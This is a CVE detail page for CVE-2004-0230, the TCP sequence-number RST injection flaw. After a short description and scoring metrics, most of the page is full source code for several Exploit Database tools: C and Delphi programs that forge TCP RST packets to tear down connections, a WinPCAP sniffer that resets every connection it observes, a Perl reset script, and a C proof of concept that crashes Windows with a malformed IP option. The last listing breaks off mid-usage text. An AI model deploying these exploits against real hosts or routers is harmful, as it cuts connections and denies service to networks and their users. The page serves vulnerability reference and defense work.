CVE-2004-0230 Detail

CVE-2004-0230

EPSS

1.95%V3

Vector

Network

Published

2004-05-05
02h00 +00:00

Modified

2018-10-19
12h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet, especially in protocols that use long-lived connections, such as BGP.

CVE Informations

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	5		AV:N/AC:L/Au:N/C:N/I:N/A:P	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 291

Publication date : 2004-04-22
22h00 +00:00
Author : Paul A. Watson
EDB Verified : Yes

/* By: Paul A. Watson Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1 COMPILE: gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a or gcc -o reset-tcp reset-tcp.c -lnet ** be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems! EXECUTE: reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size] EXAMPLE (and timing packets sent with /bin/date): [root@orc BGP]# date; ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 65536; date Tue Dec 16 21:18:28 CST 2003 Packets sent: 8192 Sequence guess: 536805376 Packets sent: 16384 Sequence guess: 1073676288 Packets sent: 24576 Sequence guess: 1610547200 Packets sent: 32768 Sequence guess: 2147418112 Packets sent: 40960 Sequence guess: 2684289024 Packets sent: 49152 Sequence guess: 3221159936 Packets sent: 57344 Sequence guess: 3758030848 packets sent: 65535 Tue Dec 16 21:18:46 CST 2003 [root@orc BGP]# */ /* modified by: J. Barber A.K.A Swoop modified to use src mac from your interface and asks for the destination mac on the command line. New Command-Line Example: ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536 swoopafied: 3/30/04 */ #include <libnet.h> #include <stdio.h> int main(int argc, char *argv[]) { int c; unsigned long int count=0; unsigned long int count2=0; unsigned long int seqguess=0; unsigned long int seqstart=0; unsigned long int seqincrement=0; unsigned long int seqmax=4294967295; u_char *cp; libnet_t *l; libnet_ptag_t t; char *payload; char * device = argv[1]; u_short payload_s; u_long src_ip, dst_ip; u_short src_prt, dst_prt; char errbuf[LIBNET_ERRBUF_SIZE]; char sourceip[32] = ""; char destinationip[32] = ""; /* Change these to suit your local environment values */ /* Make enet_dst either the default gateway or destination host */ struct libnet_ether_addr *ptr_enet_src; u_char enet_src[6]; u_char enet_dst[6]; u_char org_code[3] = {0x00, 0x00, 0x00}; /* Its only test code, so minimal checking is performed... */ if (argc<8) { printf("TCP Reset Tool v1.2\nBy Paul Watson - Modified by J. Barber\n"); printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [gateway/destination MAC] [window size]\n",argv[0]); printf("Example: ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536\n"); exit(1); } strcpy(sourceip,argv[2]); src_prt = atoi(argv[3]); strcpy(destinationip,argv[4]); dst_prt = atoi(argv[5]); seqincrement= atoi(argv[7]); seqstart= 0; seqmax = 4294967295; /* 2^32 */ payload = NULL; payload_s = 0; src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE); dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE); memset(enet_dst, 0, sizeof(enet_dst)); sscanf(argv[6], "%02X:%02X:%02X:%02X:%02X:%02X", &enet_dst[0], &enet_dst[1], &enet_dst[2], &enet_dst[3], &enet_dst[4], &enet_dst[5]); l = libnet_init(LIBNET_LINK,device,errbuf); ptr_enet_src = libnet_get_hwaddr(l); memcpy(&enet_src[0], ptr_enet_src,6); printf("Src MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0], enet_src[1],enet_src[2],enet_src[3], enet_src[4],enet_src[5]); printf("Dst MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0], enet_dst[1],enet_dst[2],enet_dst[3], enet_dst[4],enet_dst[5]); for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) { count++; count2++; if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); } l = libnet_init(LIBNET_LINK,device,errbuf); t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0); t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0); t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0); t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0); c = libnet_write(l); } printf("packets sent: %i\n",count); return (EXIT_FAILURE); }

Exploit Database EDB-ID : 24030

Publication date : 2004-03-04
23h00 +00:00
Author : Matt Edman
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/10183/info A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers. The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port. Few factors may present viable target implementations, such as imlementations that: - depend on long-lived TCP connections - have known or easily guessed IP address endpoints - have known or easily guessed TCP source ports. Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms. Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further. Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed. **Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions. /****************************************************************************************** * autoRST * Matt Edman - Baylor University * 5/3/2004 * * DESCRIPTION: * Sniffs out TCP connections on a non-switched network and attempts to reset them * by forging a RST packet in the correct window * * REQUIRED LIBRARIES: * -WinPCAP 3.1beta or higher * -WinPCAP developer's pack * * NOTES: * Just make sure you have WinPCAP 3.1beta or higher installed and the appropriate * winpcap header files downloaded and paths setup. Other than that, just start it * up and let it do its job. ******************************************************************************************/ #include <stdio.h> // WinPCAP includes #include <pcap.h> #include <remote-ext.h> // 6 byte MAC Address typedef struct mac_address { u_char byte1; u_char byte2; u_char byte3; u_char byte4; u_char byte5; u_char byte6; }mac_address; // 4 bytes IP address typedef struct ip_address{ u_char byte1; u_char byte2; u_char byte3; u_char byte4; }ip_address; // 20 bytes IP Header typedef struct ip_header{ u_char ver_ihl; // Version (4 bits) + Internet header length (4 bits) u_char tos; // Type of service u_short tlen; // Total length u_short identification; // Identification u_short flags_fo; // Flags (3 bits) + Fragment offset (13 bits) u_char ttl; // Time to live u_char proto; // Protocol u_short crc; // Header checksum ip_address saddr; // Source address ip_address daddr; // Destination address // u_int op_pad; // Option + Padding -- NOT NEEDED! }ip_header; // 20 bytes TCP Header typedef struct tcp_header { u_short sport; // Source port u_short dport; // Destination port u_int seqnum; // Sequence Number u_int acknum; // Acknowledgement number u_char hlen; // Header length u_char flags; // packet flags u_short win; // Window size u_short crc; // Header Checksum u_short urgptr; // Urgent pointer...still don't know what this is... }tcp_header; // FUNCTION PROTOTYPES void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data); void print_packet( u_char *pkt, int len ); void send_reset( mac_address *srcmac, ip_address *srcip, u_short sport, mac_address *destmac, ip_address *destip, u_short dport, u_int seqnum, u_int win ); u_int iptoUINT( ip_address *ip ); u_short csum (unsigned short *buf, int nwords); // GLOBAL VARIABLES pcap_t *adhandle; // The device handle u_int localaddr; // Local IP Address struct sockaddr_in *lSock; // Local socket structure int main( int argc, char *argv[] ) { pcap_if_t *alldevs; pcap_if_t *d; int inum; int i=0; char errbuf[PCAP_ERRBUF_SIZE]; char *localIP; // Get the list of adapters if ( pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1 ) { fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf); return 0; } // Print the list of adapters -- from Winpcap sample code for( d = alldevs; d != NULL; d = d->next ) { printf("%d. %s", ++i, d->name); if ( d->description ) printf(" (%s)\n", d->description); else printf(" (No description available)\n"); } printf("Enter the interface number (1-%d):",i); scanf("%d", &inum); // Traverse the list to the selected adapter for( d = alldevs, i = 0; i < inum-1; d = d->next, i++); // Get the local address lSock = (struct sockaddr_in *)(d->addresses->addr); localaddr = lSock->sin_addr.S_un.S_addr; printf("%d\n", localaddr); localIP = inet_ntoa(lSock->sin_addr); printf("Local Addr: %s\n", localIP); // Open the device for the capture if ( (adhandle = pcap_open( d->name,65536, PCAP_OPENFLAG_PROMISCUOUS, 10, NULL, errbuf ) ) == NULL) { fprintf(stderr,"\nUnable to open adapter: %s \n", d->name); pcap_freealldevs(alldevs); return -1; } printf("\nListening on %s...\n", d->description); pcap_freealldevs(alldevs); pcap_loop(adhandle, 0, packet_handler, NULL); return 0; } // CALLBACK function...called for each received packet void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data) { u_int ip_len; mac_address *srcmac; mac_address *destmac; ip_header *iph; tcp_header *tcph; destmac = (mac_address *)pkt_data; srcmac = (mac_address *)(pkt_data + 6); iph = (ip_header *) (pkt_data + 14); if( iph->proto == 0x06 ) { // TCP PACKETS if( localaddr != iptoUINT( &iph->saddr ) && localaddr != iptoUINT( &iph->daddr ) ) { // Don't reset our own connection ip_len = (iph->ver_ihl & 0xf) * 4; tcph = (tcp_header *)(pkt_data + 14 + ip_len); if( tcph->flags != 0x04 ) // If the RST flag is already set, no need sending another RST packet send_reset( srcmac, &iph->saddr, tcph->sport, destmac, &iph->daddr, tcph->dport, tcph->acknum, tcph->win ); } } } // Attempts to forge a RST packet and send it back to the source, resetting the TCP connection void send_reset( mac_address *srcmac, ip_address *srcip, u_short sport, mac_address *destmac, ip_address *destip, u_short dport, u_int seqnum, u_int win ) { u_short tcp_hdrcrc[16]; u_short ip_hdrcrc[10]; u_short tcp_tos = htons(0x06); u_short tcp_hlen = htons(0x14); u_short ip_tos = htons(0x0800); ip_header iph; tcp_header tcph; u_char pkt[54]; printf("Attempting to Reset: %d.%d.%d.%d:%d -> %d.%d.%d.%d:%d\n", srcip->byte1, srcip->byte2, srcip->byte3, srcip->byte4, ntohs(sport), destip->byte1, destip->byte2, destip->byte3, destip->byte4, ntohs(dport)); // Setup IP Header iph.ver_ihl = 0x45; iph.tos = 0x01; iph.tlen = htons(40); iph.identification = htons(0x0800); iph.flags_fo = 0x0; iph.ttl = 0xff; iph.proto = 0x06; iph.crc = 0x00; iph.saddr = *destip; // swap the source & dest ips iph.daddr = *srcip; // Setup TCP Header tcph.sport = dport; // swap the source & dest ports tcph.dport = sport; tcph.seqnum = htonl(ntohl(seqnum) + ntohs(win) - 2); tcph.acknum = tcph.seqnum + htonl(0x1); tcph.hlen = 0x50; tcph.flags = 0x04; tcph.win = win; tcph.urgptr = 0x00; tcph.crc = 0x00; // Calculate the IP Header Checksum memset(ip_hdrcrc, 0, 20); memcpy(ip_hdrcrc, &iph, 20); iph.crc = csum( ip_hdrcrc, 10 ); // Construct the tcp pseudo-header for checksum calculation memset(tcp_hdrcrc, 0, 32); memcpy(tcp_hdrcrc, &tcph, 20); memcpy(&tcp_hdrcrc[10], &iph.saddr, 4); memcpy(&tcp_hdrcrc[12], &iph.daddr, 4); memcpy(&tcp_hdrcrc[14], &tcp_tos, 2); memcpy(&tcp_hdrcrc[15], &tcp_hlen, 2); tcph.crc = csum( tcp_hdrcrc, 16 ); // Assemble the packet memcpy( pkt, (void *)srcmac, 6 ); memcpy( (void *)(pkt + 6), (void *)destmac, 6 ); memcpy( (void *)(pkt + 12), &ip_tos, 2); memcpy( (void *)(pkt + 14), &iph, 20 ); memcpy( (void *)(pkt + 14 + sizeof( ip_header )), &tcph, 20 ); // Send the packet if (pcap_sendpacket(adhandle, pkt, sizeof( pkt )) != 0) fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle)); } // Calculates the TCP Checksum based on the helper header u_short csum (unsigned short *buf, int nwords) { unsigned long sum=0; for( sum=0; nwords > 0; nwords-- ) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return (u_short)~sum; } // Takes in an ip_address structure and returns the equivalent 4byte UINT value u_int iptoUINT( ip_address *ip ) { u_int ipaddr; ipaddr = ip->byte4 | (ip->byte3 << 8); ipaddr = ipaddr | (ip->byte2 << 16); ipaddr = ipaddr | (ip->byte1 << 24); return htonl(ipaddr); } // Display the values in the packet on the screen void print_packet( u_char *pkt, int len ) { int i; printf("\tThe Packet\n------------------------------\n"); for( i = 0; i < len; i++ ) { if(i%4==0) printf("\n"); printf("0x%x ", pkt[i]); } printf("\n"); }

Exploit Database EDB-ID : 24031

Publication date : 2004-04-19
22h00 +00:00
Author : Paul A. Watson
EDB Verified : Yes

Exploit Database EDB-ID : 24032

Publication date : 2004-04-19
22h00 +00:00
Author : Paul Watson
EDB Verified : Yes

Exploit Database EDB-ID : 24033

Publication date : 2004-04-22
22h00 +00:00
Author : K-sPecial
EDB Verified : Yes

source: https://www.securityfocus.com/bid/10183/info A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers. The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port. Few factors may present viable target implementations, such as imlementations that: - depend on long-lived TCP connections - have known or easily guessed IP address endpoints - have known or easily guessed TCP source ports. Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms. Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further. Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed. **Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions. use Net::RawIP; ## Kreator -> K-sPecial [http://xzziroz.freeshell.org] ## Date -> 4-23-2004 ## Name -> Kreset.pl ## Version -> 1.0 ## ## Use -> Used to reset a TCP connecting. ## (Using the slipping throught he window meathod described on 4-20-04) ## DESCRIBED HERE: http://www.uniras.gov.uk/vuls/2004/236929/index.htm ## ## Usage -> If you don't fuckin know how to use it, don't use it. ## ## Other -> I played around on nix for a few hours to get the idea down ## pat. I set up an IRCD and connected to it, looked at tcpdump to ## get irssi's local port. irssi's window size was larger so I figured ## i would pretend to be sending RST from server, irssi window ## was around ## 30K while ircd window around 3K, big difference :D. So I enter values ## and since the connection is loop back, i used 0.0 seconds between ## packets. ## it only took a few minutes to disconnect with a 0.0 overlay and ## a 30K window starting at sequence number 0. Only problem over ## the internet, is finding the port of each side, sure you know the ## servers port but not the clients. I got to sequence number 1512500 ## using a .10 second delay and a window size of 2500. Sequence ## numbers are ## 32 bit numbers, 32 1's comes out to be 4294967295. ## Do the math, and you know precisely how long it takes to cover ## every sequence RANGE of a given port using a given window size. ## Window sizes should be based on application layer program. ## ## NOTE -> This script assumes you know at least one of the ports, ## if the case is otherwise ## then the script can easily be modified to work around this. Also, ## this was written for ## UNIX variants. print <<EOF; -> Kreset.pl by K-sPecial [4-23-2004] -> Used to reset a connection based on the slipping -> through the window meathod, exploited publicly on 4-20-2004. -> [http://xzziroz.freeshell.org] -> Greets: K-sPecial (myself), saevio, attila, zeedo, uzimonkey -> eightball, unmanarc, Buuyo^, and whomever else I forgot. EOF print "\r\nDo you want a port range for the source IP, or the dest IP?"; print "\r\nIf you want it for the source, type 1, otherwise 2."; print "\r\nIf you don't want it for either, type one or the other: "; chomp (my $choice = <STDIN>); unless ($choice == 1 || $choice == 2) { print "\r\nEnter 1, or 2.\r\n"; exit(1); } print "\r\nEnter source IP: "; chomp (my $sip = <STDIN>); if ($choice == 2) { print "\r\nEnter source port: "; chomp ($sport = <STDIN>); if (!($sport)) { print "\r\nYou must fill in a source port.\r\n"; } } print "\r\nEnter dest IP: "; chomp (my $dip = <STDIN>); if ($choice == 1) { print "\r\nEnter dest port: "; chomp ($dport = <STDIN>); if (!($dport)) { print "\r\nYou must fill in a destination port.\r\n"; exit(1); } } print "\r\nEnter begin port: "; chomp (my $bport = <STDIN>); print "\r\nEnter end port: "; chomp (my $eport = <STDIN>); if (!($sip) || !($dip) || !($bport) || !($eport)) { print "\r\nYou forgot to fill in one or more fields.\r\n"; exit(1); ## Yea hahah we don't exit (0) anymore. LOL } print "\r\nDestinations guessed window size,"; print "\r\nIf you don't define this, we will try small (2500): "; chomp (my $winsize = <STDIN>); ## Why did the window cross the road? if (!($winsize)) { $winsize = 2500; } print "\r\nStarting sequence number,"; print "\r\nIf you don't define this, we will start at 0: "; chomp (my $seqnum = <STDIN>); ## So he could prevent sequence numbers if (!($seqnum)) { ## from getting through! $seqnum = 0; } print "\r\nNumber of seconds to wait between each packet sent,"; print "\r\nENTER DOTTED DECIMALS HERE PRECEEDED BY A 0 TO"; print "\r\nINDICATE NO MINUTES: 0.10 == 10 ms, 0.0 = 0 ms"; print "\r\nIf you don't define this, we will use 0.10: "; chomp (my $ms = <STDIN>); if (!($ms)) { $ms = "0.10"; } print <<EOF; Source IP is -> $sip Source port is -> $sport Destination IP is -> $dip Guessed window size is -> $winsize Starting sequence number is -> $seqnum Loop wait is -> $ms Begin port is -> $bport End port is -> $eport EOF print "Destination port is -> $dport\r\n" if $dport; print "Source port is -> $sport\r\n" if $sport; print "\r\n"; my $i = $seqnum; ## LOOKS WHATS FOLLOWS! WES ARES SO LEETS WITHS OURS SELECTS TRICKSES! ## P.S K-sPecial's hopes yours usings a nix variants or this selects ## tricks just mights nots works. for ($i; 1; $i += $winsize) { if ($i > 4294967295) { $bport++; if ($bport > $eport) { print "Finished\r\n"; exit(0); } else { print "Looping next port.\r\n"; $i = $seqnum; sleep(2); next; } } if ($choice == 2) { $dport = $bport; } else { $sport = $bport; } select(undef, undef, undef, $ms); print "Sequence Number is -> $i port is -> $bport\r\n"; $a = new Net::RawIP; $a->set({ip => {saddr => "$sip",daddr => "$dip"}, tcp => {source => $sport,dest => $dport,rst => 1, syn => 1, seq => $i}}) ; $a->send; }

Exploit Database EDB-ID : 942

Publication date : 2005-04-16
22h00 +00:00
Author : Yuri Gushin
EDB Verified : Yes

/* ecl-winipdos.c - 16/04/05 * Yuri Gushin <[email protected]> * Alex Behar <[email protected]> * * This one was actually interesting, an off-by-one by our beloved * M$ :) * * When processing an IP packet with an option size (2nd byte after * the option) of 39, it will crash - since the maximum available * size is 40 for the whole IP options field, and two are already used: * [ OPT ] [ SIZE ] [ 38 more bytes ] * Checks are done to validate that the option-size field is less than * 40, where a value less than !39! should be checked for validation. * * Note that this doesn't affect ALL options, and is also dependant upon * the underlying protocol. * Anyways, a small PoC to see how it works and why, tweak test and * explore, have fun :) * * * Greets fly out to the ECL crew, Valentin Slavov, blexim, stranger, * manevski, elius, shrink, Evgeny Pinchuk, Ishay Sommer, and anyone else * who got left out :D * */ #ifndef _BSD_SOURCE #define _BSD_SOURCE #endif #include <stdio.h> #include <string.h> #include <time.h> #include <libnet.h> #define IP_H 20 #define IPOPTS_MAX 40 void banner(); void usage(char *); int main(int argc, char **argv) { char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; char *device = NULL; int c; u_char *buf; int packet_len = 0; struct ip *IP; struct tcphdr *TCP; u_int32_t src = 0, dst = 0; banner(); if (argc < 4) usage(argv[0]); if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(-1); } if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Unresolved source address\n"); exit(-1); } if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Unresolved destination address\n"); exit(-1); } if ( (buf = malloc(IP_MAXPACKET)) == NULL ) { perror("malloc"); exit(-1); } buf[20] = atoi(argv[3]); buf[21] = 39; // our malformed size for (c = 0; c<38; c+=3) strncpy(&buf[22+c], "ECL", 3); // padding TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX); TCP->th_off = 5; packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2); srand(time(NULL)); IP = (struct ip *) buf; IP->ip_v = 4; /* version 4 */ IP->ip_hl = 5 + (IPOPTS_MAX / 4);/* 60 byte header */ IP->ip_tos = 0; /* IP tos */ IP->ip_len = htons(packet_len); /* total length */ IP->ip_id = rand(); /* IP ID */ IP->ip_off = htons(0); /* fragmentation flags */ IP->ip_ttl = 64; /* time to live */ IP->ip_p = IPPROTO_TCP; /* transport protocol */ IP->ip_sum = 0; IP->ip_src.s_addr = src; IP->ip_dst.s_addr = dst; TCP->th_sport = htons(1337); TCP->th_dport = htons(80); TCP->th_seq = 0; TCP->th_ack = 0; TCP->th_x2 = 0; TCP->th_flags = TH_SYN; TCP->th_win = rand() & 0xffff; TCP->th_sum = 0; TCP->th_urp = 0; libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2); if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); exit(-1); } printf("Packet sent.\n"); libnet_destroy(l); free(buf); return (0); } void usage(char *cmd) { printf("Usage: %s <source> <destination> <option>\n",cmd); exit(-1); } void banner() { printf("\t\tWindows malformed IP Options DoS exploit\n" "\t\t Yuri Gushin <[email protected]>\n" "\t\t Alex Behar <[email protected]>\n" "\t\t\t ECL Team\n\n\n"); } // milw0rm.com [2005-04-17]

Exploit Database EDB-ID : 276

Publication date : 2004-04-21
22h00 +00:00
Author : Aphex
EDB Verified : Yes

{ AFX TCP Reset by Aphex http://www.iamaphex.cjb.net [email protected] Compile with Delphi 5/6/7 } program Project1; {$APPTYPE CONSOLE} uses Windows; type TBufferArray = array[0..65535] of byte; type iph = record ip_verlen: byte; ip_tos: byte; ip_len: word; ip_id: word; ip_offset: word; ip_ttl: byte; ip_protocol: byte; ip_checksum: word; ip_saddr: longword; ip_daddr: longword; end; tcph = record th_sport: word; th_dport: word; th_seq: longword; th_ack: longword; th_len: byte; th_flags: byte; th_win: word; th_checksum: word; th_upr: word; end; sb = packed record sb1, sb2, sb3, sb4: char; end; sw = packed record sw1, sw2: word; end; TInAddr = record case integer of 0: (ssb: sb); 1: (ssw: sw); 2: (saddr: longint); end; TSockAddr = record case integer of 0: (sin_family: word; sin_port: word; sin_addr: TInAddr; sin_zero: array[0..7] of char); 1: (sa_family: word; sa_data: array[0..13] of char) end; TWSAData = record ver: Word; hgh: Word; dsc: array[0..256] of char; sys: array[0..128] of char; skt: Word; udp: Word; ven: PChar; end; function closesocket(sk: integer): integer; stdcall; external 'WS2_32.DLL' name 'closesocket'; function htons(hs: word): word; stdcall; external 'WS2_32.DLL' name 'htons'; function htonl(hs: longint): longint; stdcall; external 'WS2_32.DLL' name 'htonl'; function ntohl(hs: longint): longint; stdcall; external 'WS2_32.DLL' name 'htonl'; function inet_addr(cp: pchar): longint; stdcall; external 'WS2_32.DLL' name 'inet_addr'; function sendto(sk: integer; var bf; ln, fl: integer; var ad: TSockAddr; le: integer): integer; stdcall; external 'WS2_32.DLL' name 'sendto'; function setsockopt(sk: integer; lv, op: integer; ov: PChar; ol: integer): integer; stdcall; external 'WS2_32.DLL' name 'setsockopt'; function socket(af, st, pr: integer): integer; stdcall; external 'WS2_32.DLL' name 'socket'; function WSACleanup: integer; stdcall; external 'WS2_32.DLL' name 'WSACleanup' function WSAGetLastError: integer; stdcall; external 'WS2_32.DLL' name 'WSAGetLastError'; function WSAStartup(vr: word; var ws: TWSAData): integer; stdcall; external 'WS2_32.DLL' name 'WSAStartup'; const INVALID_SOCKET = integer(not(0)); var hSocket: integer; WindowPos: int64; WindowCount: dword; WindowSize: dword; TargetHost: string; TargetPort: word; SourceHost: string; SourcePort: word; Odds: dword; Delay: dword; function CheckSum(var Buffer; Size: integer): word; type TWordArray = Array[0..1] of word; var lSumm: LongWord; iLoop: integer; begin lSumm := 0; iLoop := 0; while Size > 1 do begin lSumm := lSumm + TWordArray(Buffer)[iLoop]; inc(iLoop); Size := Size - SizeOf(word); end; if Size = 1 then lSumm := lSumm + Byte(TWordArray(Buffer)[iLoop]); lSumm := (lSumm shr 16) + (lSumm and $FFFF); lSumm := lSumm + (lSumm shr 16); Result := word(not lSumm); end; procedure Header(FromIP: string; FromPort: word; ToIP: string; ToPort: word; Seq: longint; Window: longint; var Buffer: TBufferArray; var Socket: TSockAddr; var Size: word); var ipHdr: iph; tcpHdr: tcph; TcpHeaderLen: word; ChecksumSize: word; DataPointer: ^byte; procedure IncPtr(Value: integer); begin DataPointer := pointer(integer(DataPointer) + Value); end; begin Size := sizeof(ipHdr) + sizeof(tcpHdr); ipHdr.ip_verlen := ((4 shl 4) or sizeof(ipHdr) div sizeof(longword)); ipHdr.ip_tos := 0; ipHdr.ip_len := htons(Size); ipHdr.ip_id := 0; ipHdr.ip_offset := 0; ipHdr.ip_ttl := 128; ipHdr.ip_protocol := 6; ipHdr.ip_checksum := 0; ipHdr.ip_saddr := inet_addr(pchar(FromIP)); ipHdr.ip_daddr := inet_addr(pchar(ToIP)); ChecksumSize := 0; tcpHdr.th_sport := htons(FromPort); tcpHdr.th_dport := htons(ToPort); tcpHdr.th_seq := htonl(Seq); tcpHdr.th_ack := htonl(Seq + Window); tcpHdr.th_len := 80; tcpHdr.th_flags := 20; tcpHdr.th_win := Window; tcpHdr.th_checksum := 0; tcpHdr.th_upr := 0; DataPointer := @Buffer[0]; FillChar(Buffer, SizeOf(Buffer), 0); Move(ipHdr.ip_saddr, DataPointer^, SizeOf(ipHdr.ip_saddr)); IncPtr(SizeOf(ipHdr.ip_saddr)); ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_saddr); Move(ipHdr.ip_daddr, DataPointer^, sizeof(ipHdr.ip_daddr)); IncPtr(SizeOf(ipHdr.ip_daddr)); ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_daddr); IncPtr(1); Inc(ChecksumSize); Move(ipHdr.ip_protocol, DataPointer^, sizeof(ipHdr.ip_protocol)); IncPtr(sizeof(ipHdr.ip_protocol)); ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_protocol); TcpHeaderLen := htons(sizeof(tcpHdr)); Move(TcpHeaderLen, DataPointer^, sizeof(TcpHeaderLen)); IncPtr(sizeof(TcpHeaderLen)); ChecksumSize := ChecksumSize + sizeof(TcpHeaderLen); Move(tcpHdr, DataPointer^, sizeof(tcpHdr)); IncPtr(sizeof(tcpHdr)); ChecksumSize := ChecksumSize + sizeof(tcpHdr); tcpHdr.th_checksum := CheckSum(Buffer, ChecksumSize); FillChar(Buffer, sizeof(Buffer), 0); DataPointer := @Buffer[0]; Move(ipHdr, DataPointer^, sizeof(ipHdr)); IncPtr(sizeof(ipHdr)); Move(tcpHdr, DataPointer^, sizeof(tcpHdr)); Socket.sin_family := 2; Socket.sin_port := htons(0); Socket.sin_addr.saddr := inet_addr(pchar(ToIP)); end; procedure Send(TargetIP: string; TargetPort: integer; SourceIP: string; SourcePort: integer; Sequence: longint; Window: longint); var Buffer: TBufferArray; Sck: TSockAddr; Size: Word; begin Header(SourceIP, SourcePort, TargetIP, TargetPort, Sequence, Window, Buffer, Sck, Size); SendTo(hSocket, Buffer, Size, 0, Sck, sizeof(Sck)); end; procedure Init; var wsdata: TWSAdata; op: integer; begin WSAStartup($0002, wsdata); hSocket := Socket(2, 3, 0); op := 1; SetSockOpt(hSocket, 0, 2, @op, sizeof(op)); end; function StrToInt(S: string): integer; begin Val(S, Result, Result); end; procedure DoExit; begin WriteLn('AFX TCP Reset'); WriteLn('http://www.iamaphex.cjb.net'); WriteLn('[email protected]'); WriteLn(''); WriteLn('Usage: reset <src ip> <src port> <dest 